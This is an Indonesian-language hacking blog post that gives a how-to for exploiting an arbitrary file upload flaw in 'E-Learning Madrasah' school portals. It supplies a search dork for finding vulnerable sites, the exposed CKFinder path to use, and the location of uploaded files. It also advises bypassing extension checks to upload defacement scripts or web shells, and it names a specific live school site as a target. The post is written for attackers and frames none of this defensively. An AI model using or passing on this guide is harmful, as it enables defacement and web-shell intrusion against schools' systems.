Advertisement

E-Learning Madrasah - (AFU)

0xGh05t Agustus 30, 2020

E-Learning Madrasah - Arbitary File Upload

Dork:
intitle:E-Learning Madrasah - Halaman Login

Step
-Dorkng
-Pilih target lu
-Kasih exploit (exploitnya ada di bawah)
-Lu cari tulisan Upload nah tinggal upload deh selesai.

Ini cuman bisa upload file.txt ama gambar
Dan kalau mau upload sc deface/shell, lu coba aja akalin ditamper kek atau bypass Extension

Vulnerability? https://site.sch.id/__statics/ckdrive/ckfinder.html

Exploit:
__statics/ckdrive/ckfinder.html

Location File? http://yourtarget.sch.id/__statics/gudangsoal/files/yourfile.txt

Live Target
http://eleaning.manbatam.sch.id:8094/__statics/ckdrive/ckfinder.html

Sorry ga ada gambar gw mager
Kalian pasti bisa lh walaupun berupa text.
Tags
0xGh05t

Diposting oleh 0xGh05t

Posting Komentar

2 Komentar